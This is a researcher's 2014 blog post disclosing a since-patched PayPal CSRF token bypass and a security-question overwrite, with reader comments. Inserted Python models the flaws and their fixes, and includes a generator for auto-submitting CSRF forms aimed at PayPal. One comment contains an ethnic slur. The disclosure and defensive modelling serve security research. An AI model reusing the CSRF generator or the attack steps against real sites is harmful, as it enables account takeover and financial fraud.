2014
10.09

Today I am going to publicly disclose a critical vulnerability I found during my research on PayPal. It enabled me to completely bypass the CSRF prevention system implemented by PayPal. The vulnerability was patched very quickly, and PayPal paid me the maximum bounty they give ;).

1- Reusable CSRF Token:

PayPal authenticates every request made by the user with a CSRF token, sent in the request body under the parameter name "Auth". The value changes with every request, which looks like a sound security measure. After a deeper investigation, however, I found that an Auth value, once issued, stays valid for that user (identified by email address or username), so the per-request rotation gives no real protection: an attacker who obtains any one of a victim's Auth values can make requests on behalf of that logged-in user.
Interesting, but still not exploitable on its own: an attacker has no way to read the "Auth" value out of a victim's session.

2- Bypassing the CSRF Auth System:

The CSRF Auth verifies every single request of a user. So what if an attacker who is not logged in tries to make a "send money" request? PayPal asks the attacker to log in with an email and password. The attacker enters the victim's email and ANY password, then captures the request with an intercepting proxy. That request already contains a valid CSRF Auth token, which is reusable and authorises requests for that specific user.

On further investigation I found that the attacker does not even need the victim's email: the Auth token obtained this way is valid for ALL users. It can be collected by intercepting the POST request from any page that issues an Auth token before the login step; for the "magical" CSRF Auth, check https://www.paypal.com/eg/cgi-bin/webscr?cmd=_send-money. At this point the attacker can CSRF almost any request on behalf of any logged-in user.

The application generates a valid "Auth" token for a logged-out user!

Examining the password change process, I found that an attacker can NOT change the victim's password without answering the security questions set by the user, and that the user cannot change the security questions without entering the password.
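To make the two properties above concrete (a token that rotates yet stays valid, and a token minted in an anonymous session being accepted for a logged-in user), here is an added Python model. It is not PayPal's code; the internal design is an assumption built from the description in sections 1 and 2. The vulnerable service only checks that a value was ever issued, while the hardened one binds each token to the presenting session with an HMAC, refuses anonymous sessions, and accepts a value only once.

```python
import hashlib
import hmac
import secrets
from dataclasses import dataclass
from typing import Optional, Tuple

# Constructed secret: the key the server keeps private for signing tokens.
SERVER_KEY = b"constructed-server-key-for-this-example"


@dataclass
class Session:
    sid: str                     # session identifier (what the cookie carries)
    user: Optional[str] = None   # None means anonymous / not logged in


class VulnerableTokenService:
    """Model of the flaw: every issued Auth value stays valid server-wide.

    Each request gets a fresh value, so the token appears to rotate, but
    validation only asks "did we ever issue this?" It never checks which
    session the value was issued to and never consumes it, so a value
    minted on a pre-login page is accepted for any logged-in user.
    """

    def __init__(self):
        self._issued = set()

    def issue(self, session: Session) -> str:
        token = secrets.token_hex(16)
        self._issued.add(token)
        return token

    def validate(self, session: Session, token: str) -> bool:
        return token in self._issued   # no session binding, never consumed


class HardenedTokenService:
    """Token = nonce.HMAC(key, sid:nonce); only the issuing session can use it, once."""

    def __init__(self):
        self._spent = set()

    def issue(self, session: Session) -> str:
        nonce = secrets.token_hex(8)
        mac = hmac.new(SERVER_KEY, f"{session.sid}:{nonce}".encode(),
                       hashlib.sha256).hexdigest()
        return f"{nonce}.{mac}"

    def validate(self, session: Session, token: str) -> bool:
        if session.user is None:
            return False   # state-changing actions require a logged-in session
        nonce, sep, mac = token.partition(".")
        if not sep:
            return False   # malformed token
        expected = hmac.new(SERVER_KEY, f"{session.sid}:{nonce}".encode(),
                            hashlib.sha256).hexdigest()
        if not hmac.compare_digest(mac, expected):
            return False   # minted for a different session (or forged)
        if nonce in self._spent:
            return False   # a value accepted once is not accepted again
        self._spent.add(nonce)
        return True


def anonymous_token_replay(service) -> bool:
    """Section 2: mint a token on a pre-login page in the attacker's anonymous
    session, then replay it in the victim's session. True means the forged
    request would be accepted."""
    attacker = Session(sid="attacker-anon-session")           # not logged in
    victim = Session(sid="victim-session", user="victim@example.com")
    stolen = service.issue(attacker)
    return service.validate(victim, stolen)


def token_replay_after_use(service) -> Tuple[bool, bool]:
    """Section 1: the victim's own token is used once legitimately and then
    replayed. Returns (first use accepted, replay accepted)."""
    victim = Session(sid="victim-session", user="victim@example.com")
    token = service.issue(victim)
    service.issue(victim)   # a later request rotates to a new value
    first_use = service.validate(victim, token)
    replay = service.validate(victim, token)
    return first_use, replay
```

Run both scenarios against each service: the vulnerable service accepts the anonymous token and the replay, the hardened one accepts only a token issued to the same logged-in session, and only once.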

3- ByPassing the Security Questions Change:

The initial process of "setting" security questions is not password-protected and is reusable

After further investigation, I noticed that the request that sets up the security questions (the one the user sends while signing up) is not password-protected, and that it can be replayed to overwrite the security questions without providing the password. Armed with the CSRF Auth, an attacker can therefore CSRF this process too and change the victim's security questions.
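An added model of the logic flaw in this section (constructed for illustration, not PayPal's code): the "reset" route asks for the password, but the "set" route used at sign-up does not, and it overwrites questions that already exist. The check a practitioner wants here is that every route that can change the same data enforces the same rule, which the hardened function does. The password comparison is plaintext only because this is a model; a real system verifies a password hash.

```python
import hmac
from typing import Callable, List, Optional


class Account:
    """Minimal account model: a password and the security questions (None until set)."""

    def __init__(self, password: str, questions: Optional[List[str]] = None):
        self.password = password
        self.questions = questions


def vulnerable_set_questions(acct: Account, questions: List[str]) -> bool:
    """The sign-up route: no password, and no check that questions already
    exist, so a replayed 'set' silently overwrites the victim's questions."""
    acct.questions = questions
    return True


def vulnerable_reset_questions(acct: Account, password: str,
                               questions: List[str]) -> bool:
    """The 'reset' route is password-protected, which is why a direct CSRF
    of this route fails: the attacker does not know the password."""
    if not hmac.compare_digest(password, acct.password):
        return False
    acct.questions = questions
    return True


def hardened_change_questions(acct: Account, password: Optional[str],
                              questions: List[str]) -> bool:
    """One rule for every route: a first-time set is allowed only while no
    questions exist (sign-up); any change afterwards needs the password,
    whichever endpoint the request arrives on."""
    if acct.questions is not None:
        if password is None or not hmac.compare_digest(password, acct.password):
            return False
    acct.questions = questions
    return True


def csrf_via_set_route(change: Callable[[Account, List[str]], bool]) -> List[str]:
    """Replay the sign-up 'set' request, with no password, against an account
    that already has questions. Returns the questions left on the account."""
    victim = Account(password="victim-secret", questions=["pet", "school"])
    change(victim, ["attacker-q1", "attacker-q2"])
    return victim.questions
```

With the vulnerable route the replay overwrites the victim's questions; with the hardened rule the same request, lacking the password, leaves them untouched while a genuine first-time set at sign-up still works.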

At this point an attacker can conduct a targeted CSRF attack against PayPal users and take full control of their accounts. The attacker can CSRF all requests, including but not limited to:

1- Add/Remove/Confirm email address
2- Add fully privileged users to a business account
3- Change security questions
4- Change billing/shipping address
5- Change payment methods
6- Change user settings (notifications/mobile settings), and more.

To automate the whole process, I coded an interactive Python server that demonstrates how an attacker could exploit this vulnerability in a real-life attack scenario.
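The author's server is not published. What follows is an added Python example, not the author's script, of the two mechanical steps such a server performs: lifting the Auth value out of a captured request body and rendering a page that submits a form carrying that value from the victim's browser (the victim's own cookies are attached by the browser; the attacker supplies only the form fields). The captured body and every field name except Auth are constructed placeholders, the target URL is the one the post names, and nothing here talks to the network.

```python
import html
from urllib.parse import parse_qs

# Constructed capture: the body of a POST intercepted from an anonymous session.
# Field names other than Auth are placeholders, not PayPal's real parameters.
CAPTURED_POST_BODY = "cmd=_send-money&Auth=deadbeefcafef00d&amount=1.00"

# The endpoint named in the post; everything posted to it here is illustrative.
TARGET_URL = "https://www.paypal.com/eg/cgi-bin/webscr"


def extract_auth(body: str) -> str:
    """Pull the Auth value out of an application/x-www-form-urlencoded body."""
    fields = parse_qs(body, keep_blank_values=True)
    values = fields.get("Auth")
    if not values or not values[0]:
        raise ValueError("captured body carries no Auth value")
    return values[0]


def build_csrf_page(action_url: str, fields: dict) -> str:
    """Render a page whose only content is a hidden form posted on load.

    Every attribute value is HTML-escaped so a field value cannot break out
    of the markup; the browser sends the form with the victim's cookies.
    """
    inputs = "\n".join(
        f'    <input type="hidden" name="{html.escape(name, quote=True)}" '
        f'value="{html.escape(value, quote=True)}">'
        for name, value in fields.items()
    )
    return (
        "<!doctype html>\n<html><body>\n"
        f'  <form id="f" method="POST" action="{html.escape(action_url, quote=True)}">\n'
        f"{inputs}\n"
        "  </form>\n"
        "  <script>document.getElementById('f').submit();</script>\n"
        "</body></html>\n"
    )


def forge_request(captured_body: str, action_url: str, wanted: dict) -> str:
    """Combine both steps: harvest Auth from the capture, then build the page
    that makes the victim's browser send `wanted` plus that Auth to action_url."""
    auth = extract_auth(captured_body)
    return build_csrf_page(action_url, {**wanted, "Auth": auth})
```

The interesting part for defenders is what this page does not need: no victim credentials, no session cookie and no per-victim token, because the harvested Auth was accepted for every session. A token bound to the victim's session would make `extract_auth` useless to the attacker.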

Here is the PoC video:


Update #1 (Dec 4th 2014):

A PayPal spokesperson released the following statement:

“One of our security researchers recently made us aware of a potential way to bypass PayPal’s Cross-Site Request Forgery (CSRF) Protection Authorization System when logging onto PayPal.com. Through the PayPal Bug Bounty program, the researcher reported this to us first and our team worked quickly to fix this potential vulnerability before any of our customers were affected by this issue. We proactively work with security researchers to learn about and stay ahead of potential threats because the security of our customers’ accounts is our top concern.” 

Update #2 (Dec 31st 2014):

Made the 3rd rank in the Top Ethical Hackers of 2014 list published by Checkmarx.

Update #3 (March 20th 2015):

This technique was listed in the Top 10 Web Hacking Techniques of 2014, at rank #6.

  1. […] Egyptian security researcher, Yasser H. Ali has reported three critical vulnerabilities in PayPal website that could be exploited by an attacker to […]

  2. How much did you get? Saying you got the max and then not saying how much it is sounds a bit unfair 🙂

  3. Yeah tell us !

    • 10,000 USD 🙂

      • MSA, congrats bro, I hope you the best ISA

  4. […] researcher Yasser Ali has publicly disclosed a vulnerability in PayPal’s website. Ali claims he was able to hijack anyone’s account […]

  5. Hi Yasser,

    I don’t really understand the part about visiting yasserali.com:8080/w3pwn

    What information is being captured in that XSS request? Was that necessary just for adding another email address, or for the password reset, or both? Can I say that if the user didn't click on the link, this attack is rather difficult to reproduce?

    Brendan

    • A CSRF attack needs user interaction; in this attack the victim has to click on the link, that's it. Regarding the Auth token, the attacker can get a valid Auth token from any request that happens in an anonymous session.

      • Thanks for the explanation. Can I access the python script code?

  6. Is the auth in the HTTP_REFERER?

  7. How much was the bounty? That’s what we really want to know 🙂

    • 10,000.00 USD 🙂

  8. Hi Yasser Ali, can you make a better video, i.e. zoom in on those commands etc.? Or even speech? Thanks for your time, and lovely hack.

  9. Yasser Ali, I can't see what you are typing etc.

    • Set the video quality to 1080px

  10. Hi Yaseer,
    Any possibility of sharing the Python code? 😛

    Nice one, congrats 🙂

  11. Holy hell you must be one happy camper with $10k USD.

    Tell us about yourself, what do you do? Age?

    • I am 28, I do security consultation 🙂

  12. Actually they paid the mudslime in falafel vouchers 🙂 Bug ruining douche.

  13. Hi, I am very impressed by your achievement. It would be nice if you could share with me how you learnt your skills in information security. I mean which books or websites?

  14. When did you report this and how many days did they take to fix it?

  15. I honestly think you deserve more. Some services offer up to 1 million for those who discover vulnerabilities in their security. This vulnerability wasn’t a Gmail, iCloud or SnapChat one, it was on an online banking/money transfer site. The consequences could have been huge and purely financial to the company.

  16. Really this was a nice catch… Congrats Yasser bro (y) 😀

  18. That was nice!! How long did it take for you to do all this ?

    • I got the idea while walking in the street. Then it took some hours to bypass the security questions and write the Python script.

  19. So there were two main issues:
    1. You were able to get a universal (for all users) CSRF token from the _send-money form
    2. There was no password protection for adding mail and changing questions

    Is it correct?

    • Yes, but there was password protection on "changing questions"; I bypassed this by calling the "set" questions function instead of the "reset" questions function and successfully overwrote the already set questions ;). Clear now?

      • Yes, thanks! Good job:)

  20. Peace be upon you,
    How are you, Ali?
    They have written an article about your blog on the Softpedia site, link to the article:
    http://news.softpedia.com/news/Critical-PayPal-Bug-Left-All-Accounts-Vulnerable-to-Hijacking-466500.shtml

  21. May I copy your clip and add some explanation in Thai? I will link back to the original clip.

    • Go ahead, share knowledge 🙂

  22. Hi Yaser,

    Excellent catch

    What baffles me, however, is that the connection with the PayPal site is not SSL protected!!!!
    If it were, your hack would be impossible to realise... Or am I missing something?

    • It is SSL protected bro!

  23. Hi Yasser,

    I've been too fast to post my previous comment, but now I'm baffled even more!!!
    PayPal DOES use SSL... So I'm at a loss how you managed to get the plaintext of the session?

    • I am intercepting my own traffic using Burp Suite; where is the problem?

  24. […] The computer security industry has made many positive changes since the early days of computing. One thing that seems to be catching on with bigger tech companies is bug bounty programs. PayPal offers such a program and [Yasser] decided to throw his hat in the ring and see if he could find any juicy vulnerabilities. His curiosity paid off big time. […]

  26. I have detected one such CSRF payload that has the potential to CSRF all PayPal functions. PayPal is presently working on that issue. Not sure how much they are going to pay me for that. Could you please tell how many days they took to fix the issue for yours? What categorization had they assigned to that issue? For me they categorized it as CSRF, though it is not a normal CSRF.

    • Hi Yasser,

      did you get a chance to look at my comment?

      Amlan

      • Yes, I have talked to you on Facebook and you didn't respond; DM me on Twitter.

        • I guess, you have contacted wrong Amlan. My twitter ID @whitesec1211 🙂

          Thanks

  27. Sorry Yasser,
    I'm not really a pentest expert... but browsing through the Burp Suite docs I'm trying to understand how it works in your case. I suppose that you've installed the Burp CA certificate into the trust chain of your browser, and the Burp proxy tool generated a certificate for http://www.paypal.com for its MITM functionality... Am I right? If so, it seems to me that an attacker who is trying to intercept traffic from another person's browser will have a much bigger challenge before him, as he will have to BREAK the SSL encryption without the help
    of a cooperating browser. Or am I missing something else?

    P.S. I’m not trying to criticise your achievement, it is pretty brilliant work IMO

    • Vadim, it’s not a man in the middle attack but a CSRF attack. If you’re not familiar with CSRF you can look up the wikipedia article, it explains the basics pretty well. The TL;DR is that you trick the user into sending the right http request to paypal’s website by e.g. making them click a link or load an “image”.

      • Hi Michal,
        Thank you for the pointer, I've brought myself up to date about CSRF attacks, so to summarize:
        I attempt an unsuccessful login to PayPal using the victim's credentials,
        while using Burp to decode the traffic and recover the auth token.
        Then I trick the user into sending an https request (email/password change for example) to PayPal with the auth
        token I collected?

    • Michal made it clear: a hacker doesn't need to be MITM. Go to OWASP and read about the CSRF attack.

  28. […] Egyptian security researcher Yasser H. Ali has demonstrated hacking PayPal with a single click, exploiting a critical vulnerability that could have put 156 million […] at risk

  29. Hi Yasser,

    Few clarifications about this issue. Is it like
    1. You navigated to the page https://www.paypal.com/eg/cgi-bin/webscr?cmd=_send-money
    2. try to transfer money
    3. Paypal asks for credential
    4. Let's say you provided [email protected] (victim email) and a wrong password (as you don't know the victim's password)
    5. You captured the auth token in Burp Suite and forwarded the authentication request (which of course will fail as the password was wrong). But the auth token used in this request can now be reused for victim id [email protected]
    6. You created a CSRF payload with the captured auth token and sent that to [email protected] as a targeted attack
    7. If the user bearing paypal id [email protected], when logged into PayPal, clicks on the link sent by you, they fall victim to your trap.

    Am I correct?

    Best
    Amlan

    • Yes, right, but you don't have to enter or know the victim's email to capture the Auth token; you can just enter any random value. No need for the victim's email.

  31. […] researcher Yasser Ali has publicly disclosed a vulnerability in PayPal’s website. Ali claims he was able to hijack anyone’s account in a […]

  32. […] said in a blog post that the “critical vulnerability” meant an attacker could hijack any PayPal user […]

  33. A thing that I didn't understand from your clip is the Python script.

    As I understand it, when the victim visits a trap, then the victim is the person sending the information, am I right? So the script is just like a tunnel to let the attacker pass the needed information so that the victim's browser sends a request to PayPal as the attacker wants.

    So the request sent to PayPal doesn't use a different session; the attacker uses the victim's session with the given token passed through the tunnel, right? Are you able to provide the script to get more understanding?

    PS. I have put your content here https://www.youtube.com/watch?v=kmPqMUkFkHg

    • The attacker can generate a CSRF which is valid for everybody. The Python script is just for automating the process and making the exploit powerful. I have seen your video, amazing 😉

  34. […] affecting more than 156 millions PayPal users. An Egyptian security researcher, Yasser H. Ali has discovered three critical vulnerabilities in PayPal website including CSRF, Auth token bypass and Resetting […]

  35. […] more than 156 million PayPal users. An Egyptian security researcher, Yasser H. Ali, has discovered three critical vulnerabilities in PayPal's website including CSRF, Auth token bypass […]

  36. […] Major, account-hijacking PayPal XSS, but it’s fixed – Yasserali Blog […]

  39. […] researcher Yasser Ali is on the good side, but he still has released details of a vulnerability that shows how easy it […]

  40. […] posted his findings on his blogpost explaining that the hack was possible with just one click as it required hackers trying to access a […]

  41. I do believe that I have been hacked. PayPal and eBay have both denied this but I have a zero bank balance. Right here at Christmas. No one can seem to help me, especially not the "big" conglomerates that ignore the problems and "deny, deny, deny". I will proceed with whatever means are available to me. Now that I have been robbed by these "hackers" and have no money left for presents, it's a sad, sad thing. Hmm, I have no choice but to move forward... thanks for letting me vent.
    To you all... have a great Christmas!
    (oh btw) first time I had ever ordered on eBay.

    • I think you have been a victim of a scam, not hacking. You should never give up; follow up with your issue until you get all your rights back.

  42. […] PayPal was quick to respond to this alert. Fix applied, Ali received a $10,000 reward. The flaw lay on the side of the authentication tokens. These codes are sent to customers and change every time the user clicks on the PayPal link. Ali, however, found that each token could be reused by making PayPal believe that the "clicking" customer is indeed the owner of the account in question. (Ali) […]

  43. […] detailed how the vulnerability could be exploited, in a blog. The essential problem lies with the fact that CSRF Auth verifies every single request of that […]

  44. The hijacked money actually is mine. Can you please send it back to me?

    • Ha ha, waiting for approval ../ good. Can I get your Facebook id?

      • Contact me on twitter and I will DM you my Facebook

    • ok I will 😀

  46. […] find an issue with the logic of the code and use it to conduct an attack. For e.g, Yasser ali demonstrated how he was able to hijack a paypal account with just a single click. So we can surely expect an […]

  47. Dear Yasser,
    May I please have the source of your Python program to help me learn more about information security? I know that it doesn't work anymore, but I just want to look at the source.

  49. […] Belkin Buffer Overflow via Web 25. Google User De-Anonymization 26. Soaksoak WordPress Malware 27. Hacking PayPal Accounts with 1 Click 28. Same Origin Bypass in Adobe Reader […]

  51. Hi Yasser... I am a newbie also and I want to learn... can you provide the source code please??... I want to research...

    • The source code has nothing to do with research!

  52. what tools did you use? sorry noobie, still learning

    • Just burp proxy 🙂

  53. […] Yesser H. Ali, an Egyptian computer security researcher, found three major vulnerabilities in the PayPal payment service, among them XSRF (Cross-site request forgery). It is an extremely dangerous flaw, since with it an attacker can register his own email address on the victim's PayPal account if she clicks a malicious HTML link. Security questions do not help here either, because the vulnerability lets the attacker bypass the questions and directly reset the password. How simple this way of hijacking an account is was shown by Yesser himself on his blog, and you can see the video here: http://yasserali.com/hacking-paypal-accounts-with-one-click/ […]

  54. […] requests). He described this vulnerability in detail on his blog; we have translated and adapted the post with the description […]

  55. […] Hacking PayPal Accounts with 1 Click […]

  56. Is the vuln still active? A lot of hackings regarding paypal this month.

  57. How did you do it, engineer?

  58. can i add money to my paypal

    • Nope, PayPal is secure

  59. Brilliant, loved it 😀

  60. I think you entered an invalid email (in the text input >> from email) .......@yahuauyaaa.net
    But to whom does this token belong, as it isn't a valid email!!!!!?

    • This was a valid-for-all token, a token not associated with any session, so it is valid for any session!

  61. hey bro, don't hack mine, I am also connected with the US, pls

  62. nice

  63. hi, video link please

    • I have uploaded a new video, kindly refresh the page

  64. […] Egyptian security researcher, Yasser H. Ali has discovered three critical vulnerabilities in PayPal website including CSRF, Auth token bypass and […]

  65. nice work bro…congratsss 🙂

  66. GreaT 😀

    #RESPECT

    I've been trying for 3 months, nothing HAPPENED 🙂